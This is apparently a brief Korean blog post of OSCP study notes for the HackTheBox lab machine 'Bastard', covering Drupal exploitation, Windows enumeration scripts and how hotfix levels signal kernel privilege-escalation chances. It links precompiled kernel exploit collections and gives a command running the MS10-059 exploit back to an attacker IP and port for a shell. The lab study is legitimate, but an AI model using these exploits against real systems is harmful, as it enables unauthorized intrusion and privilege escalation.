OSCP/HackTheBox

[Windows] Batard

우와해커 2020. 9. 27. 17:42

Bastard

- Drupal 취약점 코드 어떻게 실행할 것인지

- 파워 쉘 스크립트 실행 제약

=> powerless.bat, jaws-enum.ps1


Systeminfo

서비스팩 버전이 낮거나 없거나 핫픽스가 없을 경우 GOOD

Hotfix: N/A              <= 커널 권한상승 가능성 높음

반대로 Hotfix 업데이트가 많은 경우 <= 커널 가능성 낮음, misconfig 설정을 찾을 것


Precompiled Binary

https://github.com/SecWiki/windows-kernel-exploits

https://github.com/SecWiki/linux-kernel-exploits


c:\inetpub\drupal-7.54>MS10-059.exe 10.10.14.37 7777

저작자표시

'OSCP > HackTheBox' 카테고리의 다른 글

[Windows] Access  (0) 2020.09.26
[Windows] Chatterbox  (0) 2020.09.24
[Windows] Jerry  (0) 2020.09.24
[Linux] SwagShop  (0) 2020.09.18
[Linux] Irked  (0) 2020.09.16

'OSCP/HackTheBox'의 다른글

  • 현재글[Windows] Batard

관련글

댓글

티스토리툴바